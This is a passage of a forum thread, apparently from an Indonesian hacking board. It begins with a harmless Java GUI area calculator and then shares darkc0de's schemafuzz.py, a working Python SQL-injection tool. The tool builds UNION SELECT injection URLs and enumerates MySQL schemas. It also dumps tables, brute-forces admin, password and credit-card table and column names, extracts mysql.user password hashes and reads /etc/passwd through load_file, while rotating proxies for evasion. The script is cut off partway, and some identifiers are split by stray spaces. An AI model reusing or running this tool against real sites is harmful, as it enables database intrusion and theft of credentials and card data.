    Cara menggunakan : Save dgn namafile HitungLuas.java compile seperti biasa menggunakan perintah
    Code:
    javac HitungLuas.java
    dan eksekusi dgn perintah
    Code:
    java HitungLuas
    Screenshot


    Spoiler untuk code :

    import java.awt.Container;
    import java.awt.Insets;
    import java.awt.Dimension;
    import javax.swing.*;
    import java.awt.event.*;
    import java.awt.Toolkit;


    public class HitungLuas{
    private static JFrame frame;
    private static JLabel lblPanjang, lblLebar, lblLuas;
    private static JTextField txtPanjang, txtLebar, txtLuas;
    private static JButton btnHitung, btnClose;

    private static void setObjectBounds(JComponent jc, Insets insets,
    int left, int top, int width, int height){
    Dimension size = jc.getPreferredSize();
    jc.setBounds(insets.left + left,
    insets.top + top,
    width, height);

    }

    private static void addComponentsToPane(Container pane) {
    pane.setLayout(null);

    btnHitung = new JButton("Hitung");
    btnClose = new JButton("Close");
    lblPanjang = new JLabel("Panjang");
    lblLebar = new JLabel("Lebar");
    lblLuas = new JLabel("Luas");
    txtPanjang = new JTextField();
    txtLebar = new JTextField();
    txtLuas = new JTextField();

    pane.add(lblPanjang);
    pane.add(lblLebar);
    pane.add(lblLuas);
    pane.add(txtPanjang);
    pane.add(txtLebar);
    pane.add(txtLuas);
    pane.add(btnHitung);
    pane.add(btnClose);

    Insets insets = pane.getInsets();
    Dimension size;

    size = lblPanjang.getPreferredSize();
    setObjectBounds(lblPanjang, insets, 10, 5, size.width, size.height);
    size = lblLebar.getPreferredSize();
    setObjectBounds(lblLebar, insets, 10, 30, size.width, size.height);
    size = lblLuas.getPreferredSize();
    setObjectBounds(lblLuas, insets, 10, 55, size.width, size.height);
    setObjectBounds(txtPanjang, insets, 70, 5, 120, 20);
    setObjectBounds(txtLebar, insets, 70, 30, 120, 20);
    setObjectBounds(txtLuas, insets, 70, 55, 120, 20);
    size = btnHitung.getPreferredSize();
    setObjectBounds(btnHitung, insets, 45, 80, size.width, size.height);
    size = btnClose.getPreferredSize();
    setObjectBounds(btnClose, insets, 125, 80, size.width, size.height);
    btnClose.addActionListener(new MyAction());
    btnHitung.addActionListener(new MyAction());
    }

    private static void createAndShowGUI() {
    //Create and set up the window.
    frame = new JFrame("Hitung Luas");
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOS E);

    //Set up the content pane.
    addComponentsToPane(frame.getContentPane());

    //Size and display the window.
    Insets insets = frame.getInsets();
    frame.setSize(210, 150);

    Toolkit toolKit = Toolkit.getDefaultToolkit();
    Dimension screenSize = toolKit.getScreenSize();
    frame.setLocation(((screenSize.width - frame.getWidth())/2),
    ((screenSize.height - frame.getHeight())/2));

    frame.setVisible(true);
    }

    public static class MyAction implements ActionListener{
    public void actionPerformed(ActionEvent e){
    Object source = e.getSource();
    if(source == btnHitung){
    try{
    String pjgString, lbrString, luasString;
    pjgString = txtPanjang.getText();
    lbrString = txtLebar.getText();

    int pjg = Integer.parseInt(pjgString);
    int lbr = Integer.parseInt(lbrString);
    int luas = pjg * lbr;
    luasString = Integer.toString(luas);
    txtLuas.setText(luasString);
    }catch(Exception ex){
    JOptionPane.showMessageDialog(frame, "Error",
    "Harap isi panjang dan lebar dengan benar.",
    JOptionPane.ERROR_MESSAGE);
    }
    }else if(source == btnClose){
    System.exit(0);
    }
    }
    }

    public static void main(String[] args) {
    //Schedule a job for the event-dispatching thread:
    //creating and showing this application's GUI.
    javax.swing.SwingUtilities.invokeLater(new Runnable() {
    public void run() {
    createAndShowGUI();
    }
    });
    }
    }
    Last edited by bl00d13z; 24-05-09 at 18:43.

  16. #15

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Python
    Fungsi : SQLinjection tools. untuk memahami konsep dan langkah manualnya bisa berkunjung kesini
    platform: All
    Cara menggunakan : Save dgn ekstensi .py lalu eksekusi dengan perintah
    Code:
    Python namefile.py
    Credits : d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, and the darkc0de crew
    Screenshot


    Spoiler untuk code :

    #!/usr/bin/python
    ################################################## ##############
    # .___ __ _______ .___ #
    # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
    # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
    # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
    # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
    # \/ \/ \/ #
    # ___________ ______ _ __ #
    # _/ ___\_ __ \_/ __ \ \/ \/ / #
    # \ \___| | \/\ ___/\ / #
    # \___ >__| \___ >\/\_/ #
    # est.2007 \/ \/ forum.darkc0de.com #
    ################################################## ##############
    # MySQL Injection Schema, Dataext, and fuzzer

    # Share the c0de!

    # Darkc0de Team
    # www.darkc0de.com
    # rsauron[at]gmail[dot]com

    # Greetz to
    # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
    # and the darkc0de crew

    # NOTES:
    # Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
    # The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
    # will not be used. This is a effort to keep the script from getting stuck in a endless loop.
    # Any other questions Hit the forums and ask questions. google is your friend!

    # This was written for educational purpose only. Use it at your own risk.
    # Author will be not responsible for any damage!
    # Intended for authorized Web Application Pen Testing!

    # BE WARNED, THIS TOOL IS VERY LOUD..

    #Set default evasion options here
    arg_end = "--"
    arg_eva = "+"

    #colMax variable for column Finder
    colMax = 205
    #Fill in the tables you want tested here.
    fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
    #Fill in the columns you want tested here.
    fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', '*****', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']

    import urllib, sys, re, os, socket, httplib, urllib2, time, random

    #determine platform
    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    SysCls = 'clear'
    elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
    else:
    SysCls = 'unknown'

    #say hello
    os.system(SysCls)
    if len(sys.argv) <= 1:
    print "\n|---------------------------------------------------------------|"
    print "| rsauron[@]gmail[dot]com v5.0 |"
    print "| 6/2008 schemafuzz.py |"
    print "| -MySQL v5+ Information_schema Database Enumeration |"
    print "| -MySQL v4+ Data Extractor |"
    print "| -MySQL v4+ Table & Column Fuzzer |"
    print "| Usage: schemafuzz.py [options] |"
    print "| -h help darkc0de.com |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)


    #help option
    for arg in sys.argv:
    if arg == "-h":
    print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com"
    print "\tModes:"
    print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+"
    print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+"
    print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+"
    print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+"
    print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+"
    print "\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+"
    print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+"
    print "\n\tRequired:"
    print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
    print "\n\tMode dump and schema options:"
    print "\tDefine: -D \"database_name\""
    print "\tDefine: -T \"table_name\""
    print "\tDefine: -C \"column_name,column_name...\""
    print "\n\tOptional:"
    print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
    print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt"
    print "\tDefine: -r row number to start at"
    print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode."
    print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
    print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
    print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
    print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
    print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
    print " Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
    sys.exit(1)

    #define varablies
    site = ""
    dbt = "schemafuzzlog.txt"
    proxy = "None"
    count = 0
    arg_table = "None"
    arg_database = "None"
    arg_columns = "None"
    arg_row = "Rows"
    arg_verbose = 1
    darkc0de = "concat(0x1e,0x1e,"
    mode = "None"
    line_URL = ""
    count_URL = ""
    gets = 0
    cur_db = ""
    cur_table = ""
    table_num = 0
    terminal = ""
    num = 0


    #Check args
    for arg in sys.argv:
    if arg == "-u":
    site = sys.argv[count+1]
    elif arg == "-o":
    dbt = sys.argv[count+1]
    elif arg == "-p":
    proxy = sys.argv[count+1]
    elif arg == "--dump":
    mode = arg
    arg_dump = sys.argv[count]
    elif arg == "--full":
    mode = arg
    elif arg == "--schema":
    mode = arg
    arg_schema = sys.argv[count]
    elif arg == "--dbs":
    mode = arg
    arg_dbs = sys.argv[count]
    elif arg == "--fuzz":
    mode = arg
    arg_fuzz = sys.argv[count]
    elif arg == "--info":
    mode = arg
    arg_info = sys.argv[count]
    elif arg == "--findcol":
    mode = arg
    arg_findcol = sys.argv[count]
    elif arg == "-D":
    arg_database = sys.argv[count+1]
    elif arg == "-T":
    arg_table = sys.argv[count+1]
    elif arg == "-C":
    arg_columns = sys.argv[count+1]
    elif arg == "-end":
    arg_end = sys.argv[count+1]
    if arg_end == "--":
    arg_eva = "+"
    else:
    arg_eva = "/**/"
    elif arg == "-r":
    num = sys.argv[count+1]
    table_num = num
    elif arg == "-v":
    arg_verbose = sys.argv[count]
    arg_verbose = 0
    count+=1

    #Title write
    file = open(dbt, "a")
    print "\n|---------------------------------------------------------------|"
    print "| rsauron[@]gmail[dot]com v5.0 |"
    print "| 6/2008 schemafuzz.py |"
    print "| -MySQL v5+ Information_schema Database Enumeration |"
    print "| -MySQL v4+ Data Extractor |"
    print "| -MySQL v4+ Table & Column Fuzzer |"
    print "| Usage: schemafuzz.py [options] |"
    print "| -h help darkc0de.com |"
    print "|---------------------------------------------------------------|"
    file.write("\n|---------------------------------------------------------------|")
    file.write("\n| rsauron[@]gmail[dot]com v5.0 |")
    file.write("\n| 6/2008 schemafuzz.py |")
    file.write("\n| -MySQL v5+ Information_schema Database Enumeration |")
    file.write("\n| -MySQL v4+ Data Extractor |")
    file.write("\n| -MySQL v4+ Table & Column Fuzzer |")
    file.write("\n| Usage: schemafuzz.py [options] |")
    file.write("\n| -h help darkc0de.com |")
    file.write("\n|---------------------------------------------------------------|")

    #Arg Error Checking
    if site == "":
    print "\n[-] Must include -u flag and specify a mode."
    print "[-] For help -h\n"
    sys.exit(1)
    if mode == "None":
    print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
    print "[-] For help -h\n"
    sys.exit(1)
    if mode == "--schema" and arg_database == "None":
    print "[-] Must include -D flag!"
    print "[-] For Help -h\n"
    sys.exit(1)
    if mode == "--dump":
    if arg_table == "None" or arg_columns == "None":
    print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
    print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
    print "[-] For help -h\n"
    sys.exit(1)
    if mode != "--findcol" and site.find("darkc0de") == -1:
    print "\n[-] Site must contain \'darkc0de\'\n"
    sys.exit(1)
    if proxy != "None":
    if len(proxy.split(".")) == 2:
    proxy = open(proxy, "r").read()
    if proxy.endswith("\n"):
    proxy = proxy.rstrip("\n")
    proxy = proxy.split("\n")
    if arg_columns != "None":
    arg_columns = arg_columns.split(",")
    if site[:7] != "http://":
    site = "http://"+site
    if site.endswith("/*"):
    site = site.rstrip('/*')
    if site.endswith("--"):
    site = site.rstrip('--')

    #Getting the URL ready with the evasion options we selected
    site = site.replace("+",arg_eva)
    site = site.replace("/**/",arg_eva)
    print "\n[+] URL:",site+arg_end
    file.write("\n\n[+] URL:"+site+arg_end+"\n")
    print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
    file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
    print "[+] %s" % time.strftime("%X")
    file.write("\n[+] %s" % time.strftime("%X"))

    #Build proxy list
    socket.setdefaulttimeout(20)
    proxy_list = []
    if proxy != "None":
    file.write("\n[+] Building Proxy List...")
    print "[+] Building Proxy List..."
    for p in proxy:
    try:
    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
    opener = urllib2.build_opener(proxy_handler)
    gets+=1
    opener.open("http://www.google.com")
    proxy_list.append(urllib2.build_opener(proxy_handl er))
    file.write("\n\tProxy:"+p+"- Success")
    print "\tProxy:",p,"- Success"
    except:
    file.write("\n\tProxy:"+p+"- Failed")
    print "\tProxy:",p,"- Failed"
    pass
    if len(proxy_list) == 0:
    print "[-] All proxies have failed. App Exiting"
    sys.exit(1)
    print "[+] Proxy List Complete"
    file.write("\n[+] Proxy List Complete")
    else:
    print "[-] Proxy Not Given"
    file.write("\n[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())
    proxy_num = 0
    proxy_len = len(proxy_list)

    #colFinder
    if mode == "--findcol":
    print "[+] Attempting To find the number of columns..."
    file.write("\n[+] Attempting To find the number of columns...")
    print "[+] Testing: ",
    file.write("\n[+] Testing: ",)
    checkfor=[]
    sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+a rg_eva+"SELECT"+arg_eva
    makepretty = ""
    for x in xrange(0,colMax):
    try:
    sys.stdout.write("%s," % (x))
    file.write(str(x)+",")
    sys.stdout.flush()
    darkc0de = "dark"+str(x)+"c0de"
    checkfor.append(darkc0de)
    if x > 0:
    sitenew += ","
    sitenew += "0x"+darkc0de.encode("hex")
    finalurl = sitenew+arg_end
    gets+=1
    proxy_num+=1
    source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
    for y in checkfor:
    colFound = re.findall(y,source)
    if len(colFound) >= 1:
    print "\n[+] Column Length is:",len(checkfor)
    file.write("\n[+] Column Length is: "+str(len(checkfor)))
    nullcol = re.findall(("\d+"),y)
    print "[+] Found null column at column #:",nullcol[0]
    file.write("\n[+] Found null column at column #: "+nullcol[0])
    for z in xrange(0,len(checkfor)):
    if z > 0:
    makepretty += ","
    makepretty += str(z)
    site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+a rg_eva+"SELECT"+arg_eva+makepretty
    print "[+] SQLi URL:",site+arg_end
    file.write("\n[+] SQLi URL: "+site+arg_end)
    site = site.replace(","+nullcol[0]+",",",darkc0de,")
    site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
    site = site.replace(","+nullcol[0],",darkc0de")
    print "[+] darkc0de URL:",site
    file.write("\n[+] darkc0de URL: "+site)
    print "[-] Done!\n"
    file.write("\n[-] Done!\n")
    sys.exit(1)
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    pass

    print "\n[!] Sorry Column Length could not be found."
    file.write("\n[!] Sorry Column Length could not be found.")
    print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
    print "[-] Done\n"
    sys.exit(1)

    #Retireve version:user:database
    head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version( ),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
    print "[+] Gathering MySQL Server Configuration..."
    file.write("\n[+] Gathering MySQL Server Configuration...\n")

    while 1:
    try:
    gets+=1
    source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
    # Uncomment the following lines to debug issues with gathering server information
    # print head_URL
    # print source
    match = re.findall("\x1e\x1e\S+",source)
    if len(match) >= 1:
    match = match[0][2:].split("\x1e")
    version = match[0]
    user = match[1]
    database = match[2]
    print "\tDatabase:", database
    print "\tUser:", user
    print "\tVersion:", version
    file.write("\tDatabase: "+database+"\n")
    file.write("\tUser: "+user+"\n")
    file.write("\tVersion: "+version)
    version = version[0]
    break
    else:
    print "[-] No Data Found"
    sys.exit(1)
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    proxy_num+=1

    # Do we have Access to MySQL database and Load_File
    if mode == "--info":
    head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("he x"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_en d
    gets+=1
    proxy_num+=1
    #print "Debug:",head_URL
    source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
    match = re.findall("darkc0de",source)
    if len(match) >= 1:
    yesno = "Yes <-- w00t w00t"
    else:
    yesno = "No"
    print "\n[+] Do we have Access to MySQL Database:",yesno
    file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
    if yesno == "Yes <-- w00t w00t":
    print "[!]",site.replace("darkc0de","concat(user,0x3a,passwo rd)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
    file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,passwo rd)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end )
    gets+=1
    proxy_num+=1
    head_URL = site.replace("darkc0de","load_file(0x2f6574632f706 173737764)")+arg_end
    #print "Debug:",head_URL
    source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
    match = re.findall("root:x:",source)
    match = re.findall("root:*:",source)
    if len(match) >= 1:
    yesno = "Yes <-- w00t w00t"
    else:
    yesno = "No"
    print "\n[+] Do we have Access to Load_File:",yesno
    file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
    if yesno == "Yes <-- w00t w00t":
    print "[!]",site.replace("darkc0de","load_file(0x2f6574632f7 06173737764)")+arg_end
    file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f7 06173737764)")+arg_end)

    #lets check what we can do based on version
    if mode == "--schema" or mode == "--dbs" or mode == "--full":
    if int(version) == 4:
    print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
    print "[-] -h for help"
    sys.exit(1)
    #Build URLS
    if mode == "--schema":
    if arg_database != "None" and arg_table == "None":
    print "[+] Showing Tables & Columns from database \""+arg_database+"\""
    file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_sc hema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns "+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_da tabase.encode("hex")
    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(ta ble_schema),0x1e,0x20)")
    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables" +arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_dat abase.encode("hex")+arg_end
    arg_row = "Tables"
    if arg_database != "None" and arg_table != "None":
    print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
    file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_sc hema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS "+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_da tabase.encode("hex")
    line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table. encode("hex")
    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*) ,0x1e,0x20)")
    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS "+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_da tabase.encode("hex")
    count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table. encode("hex")+arg_end
    arg_row = "Columns"
    elif mode == "--dump":
    print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    print "[+] and Column(s) "+str(arg_columns)
    file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
    file.write("\n[+] Column(s) "+str(arg_columns))
    for column in arg_columns:
    darkc0de += column+",0x1e,"
    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*) ,0x1e,0x20)")
    count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+ arg_end
    line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
    if int(version) == 4:
    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*) ,0x1e,0x20)")
    count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
    line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+arg_table
    elif mode == "--full":
    print "[+] Starting full SQLi information_schema enumeration..."
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_sc hema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns +"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"inf ormation_schema".encode("hex")

    elif mode == "--dbs":
    print "[+] Showing all databases current user has access too!"
    file.write("\n[+] Showing all databases current user has access too!")
